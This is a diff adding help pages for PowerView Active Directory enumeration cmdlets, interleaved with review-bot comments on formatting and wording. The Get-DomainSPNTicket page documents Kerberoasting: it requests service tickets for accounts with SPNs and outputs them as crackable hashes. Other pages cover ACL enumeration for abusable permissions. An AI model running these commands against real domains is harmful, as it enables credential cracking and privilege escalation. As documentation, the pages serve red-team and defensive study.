+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
+ [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainObject -Domain testlab.local
+```
+
+Return all objects for the testlab.local domain
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname
+```
+
+distinguishedname
+-----------------
+CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local
+CN=dfm,CN=Users,DC=testlab,DC=local
+OU=OU3,DC=testlab,DC=local
+CN=dfm (admin),CN=Users,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObject -Credential $Cred -Identity 'windows1'
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-Domain | Select-Object -Expand name
+```
+
+testlab.local
+
+'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainUser\] Extracted domain 'testlab.local' from 'testlab\harmj0y'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+
+distinguishedname
+-----------------
+CN=harmj0y,CN=Users,DC=testlab,DC=local
+VERBOSE: \[Get-DomainUser\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins)))
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ADObject
+
+Custom PSObject with translated AD object property fields.
+
+PowerView.ADObject.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
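Review bot: the sample output in Examples 2 and 4 sits outside any code fence, so the `distinguishedname` table and the `VERBOSE:` lines render as ordinary markdown paragraphs; as with the other files, the blank line inside the example in the comment-based help is what cuts the fence short. While looking at Example 4, note that the verbose messages read `VERBOSE: [Get-DomainUser] Extracted domain 'testlab.local' from 'testlab\harmj0y'` even though the function running is Get-DomainObject; that tag looks copied from Get-DomainUser's Write-Verbose call and should say `[Get-DomainObject]`. Under OUTPUTS, `PowerView.ADObject.Raw` is listed as a bare line rather than a `###` heading like `### PowerView.ADObject`, so it will not show up as a second output type. Also `properies` in DESCRIPTION should be `properties`.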
diff --git a/docs/Recon/Get-DomainObjectAcl.md b/docs/Recon/Get-DomainObjectAcl.md new file mode 100755 index 0000000..97f70cd --- /dev/null +++ b/docs/Recon/Get-DomainObjectAcl.md @@ -0,0 +1,251 @@ +# Get-DomainObjectAcl
+
+## SYNOPSIS
+Returns the ACLs associated with a specific active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap
+
+## SYNTAX
+
+```
+Get-DomainObjectAcl [[-Identity] <String[]>] [-ResolveGUIDs] [-RightsFilter <String>] [-Domain <String>]
+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs
+```
+
+Get the ACLs for the matt.admin user in the testlab.local domain and
+resolve relevant GUIDs to their display names.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs
+```
+
+Enumerate the ACL permissions for all OUs in the domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ResolveGUIDs
+Switch.
+Resolve GUIDs to their display names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RightsFilter
+A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Rights
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ACL
+
+Custom PSObject with ACL entries.
+
+## NOTES
+
+## RELATED LINKS
+
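Review bot: the DESCRIPTION for Get-DomainObjectAcl is the untouched platyPS placeholder `{{Fill in the Description}}`, which means the function's comment-based help has no .DESCRIPTION block at all. Since this is the function people reach for when hunting abusable ACEs, it needs a real description before this ships: what gets enumerated (the DACL of each matched object), what -ResolveGUIDs changes in the output (extended-right and schema GUIDs rendered as names), and what -RightsFilter's `'All', 'ResetPassword', 'WriteMembers'` values select. Example 3 has the same broken fence as the other files, with `$Cred = New-Object ...` and `Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs` outside the code block.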
diff --git a/docs/Recon/Get-DomainPolicy.md b/docs/Recon/Get-DomainPolicy.md new file mode 100755 index 0000000..8b7d157 --- /dev/null +++ b/docs/Recon/Get-DomainPolicy.md @@ -0,0 +1,159 @@ +# Get-DomainPolicy
+
+## SYNOPSIS
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, ConvertFrom-SID
+
+## SYNTAX
+
+```
+Get-DomainPolicy [[-Domain] <String>] [-Source <String>] [-Server <String>] [-ServerTimeLimit <Int32>]
+ [-ResolveSids] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns the default domain policy or the domain controller policy for the current
+domain or a specified domain/domain controller using Get-DomainGPO.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainPolicy
+```
+
+Returns the domain policy for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainPolicy -Domain dev.testlab.local
+```
+
+Returns the domain policy for the dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainPolicy -Source DC -Domain dev.testlab.local
+```
+
+Returns the policy for the dev.testlab.local domain controller.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainPolicy -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+The domain to query for default policies, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Source
+Extract 'Domain' or 'DC' (domain controller) policies.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Domain
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResolveSids
+Switch.
+Resolve Sids from a DC policy to object names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### Hashtable
+
+Ouputs a hashtable representing the parsed GptTmpl.inf file.
+
+## NOTES
+
+## RELATED LINKS
+
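Review bot: `Ouputs a hashtable representing the parsed GptTmpl.inf file.` under OUTPUTS should be `Outputs`. Example 4 has the same split fence as the other files, leaving `$Cred = New-Object ...` and `Get-DomainPolicy -Credential $Cred` outside the code block. One wording point: -ResolveSids says `Resolve Sids from a DC policy to object names`, which implies the switch only applies with `-Source DC`; if that is the intent, say so explicitly in the description, and if it also resolves SIDs in the default domain policy, drop the "DC" qualifier. The -ServerTimeLimit description and yaml default disagree here as well (`Default of 120 seconds.` versus `Default value: 0`).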
diff --git a/docs/Recon/Get-DomainSID.md b/docs/Recon/Get-DomainSID.md new file mode 100755 index 0000000..16c51ce --- /dev/null +++ b/docs/Recon/Get-DomainSID.md @@ -0,0 +1,102 @@ +# Get-DomainSID
+
+## SYNOPSIS
+Returns the SID for the current domain or the specified domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer
+
+## SYNTAX
+
+```
+Get-DomainSID [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Returns the SID for the current domain or the specified domain by executing
+Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)
+to search for domain controllers through LDAP.
+The SID of the returned domain controller
+is then extracted.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSID
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainSID -Domain testlab.local
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSID -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### String
+
+A string representing the specified domain SID.
+
+## NOTES
+
+## RELATED LINKS
+
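Review bot: Examples 1 and 2 are bare commands with no line explaining what they return, unlike every other file in this commit; a one-line description under each (`Returns the SID of the current domain.` / `Returns the SID of the testlab.local domain.`) would match the house style. Example 3 has the same split fence as elsewhere. The DESCRIPTION stops at `The SID of the returned domain controller is then extracted.` without saying how the domain SID is obtained from the DC's SID; stating that the trailing RID is stripped from the DC computer account's objectsid would make the output (`A string representing the specified domain SID.`) unambiguous, and would also tell the reader that the function fails if no object matches `(userAccountControl:1.2.840.113556.1.4.803:=8192)` under the chosen -Server.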
diff --git a/docs/Recon/Get-DomainSPNTicket.md b/docs/Recon/Get-DomainSPNTicket.md new file mode 100755 index 0000000..70385a4 --- /dev/null +++ b/docs/Recon/Get-DomainSPNTicket.md @@ -0,0 +1,136 @@ +# Get-DomainSPNTicket
+
+## SYNOPSIS
+Request the kerberos ticket for a specified service principal name (SPN).
+
+Author: machosec, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+### RawSPN (Default)
+```
+Get-DomainSPNTicket [-SPN] <String[]> [-OutputFormat <String>] [-Credential <PSCredential>]
+```
+
+### User
+```
+Get-DomainSPNTicket [-User] <Object[]> [-OutputFormat <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will either take one/more SPN strings, or one/more PowerView.User objects
+(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN
+using System.IdentityModel.Tokens.KerberosRequestorSecurityToken.
+The encrypted
+portion of the ticket is then extracted and output in either crackable John or Hashcat
+format (deafult of John).
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
+```
+
+Request a kerberos service ticket for the specified SPN.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket
+```
+
+Request kerberos service tickets for all SPNs passed on the pipeline.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
+```
+
+Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.
+
+## PARAMETERS
+
+### -SPN
+Specifies the service principal name to request the ticket for.
+
+```yaml
+Type: String[]
+Parameter Sets: RawSPN
+Aliases: ServicePrincipalName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -User
+Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.
+
+```yaml
+Type: Object[]
+Parameter Sets: User
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -OutputFormat
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Format
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote domain using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
+
+### PowerView.User
+
+Accepts one or more PowerView.User objects on the pipeline with the User parameter set.
+
+## OUTPUTS
+
+### PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+
+## NOTES
+
+## RELATED LINKS
+
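Review bot: `format (deafult of John).` in DESCRIPTION should be `default`. The SYNTAX block shows -SPN and -User both at position 1 and both accepting pipeline input ByValue in separate parameter sets, but nothing in the page says how a piped object is routed to the `User` set rather than coerced to a string for `RawSPN`; the DESCRIPTION or the -User entry should state how the binder is made to pick the right set for `Get-DomainUser -SPN | Get-DomainSPNTicket`. The -Credential entry says the alternate credentials are used `using Invoke-UserImpersonation`, and Invoke-RevertToSelf is listed as a dependency; the help should say that the impersonation is reverted before the function returns, since that is the behaviour a caller has to rely on when running this under an existing token.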
diff --git a/docs/Recon/Get-DomainSite.md b/docs/Recon/Get-DomainSite.md new file mode 100755 index 0000000..caf7790 --- /dev/null +++ b/docs/Recon/Get-DomainSite.md @@ -0,0 +1,309 @@ +# Get-DomainSite
+
+## SYNOPSIS
+Search for all sites or specific site objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainSite [[-Identity] <String[]>] [-GPLink <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties whencreated,usnchanged,...".
+By default, all site objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainSite
+```
+
+Returns the current sites in the domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainSite *admin* -Domain testlab.local
+```
+
+Returns all sites with "admin" in their name in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+```
+
+Returns all sites with linked to the specified group policy object.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSite -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+An site name (e.g.
+Test-Site), DistinguishedName (e.g.
+CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or
+GUID (e.g.
+c37726ef-2b64-4524-b85b-6a9700c234dd).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -GPLink
+Only return sites with the specified GUID in their gplink property.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: GUID
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Site
+
+Custom PSObject with translated site property fields.
+
+## NOTES
+
+## RELATED LINKS
+
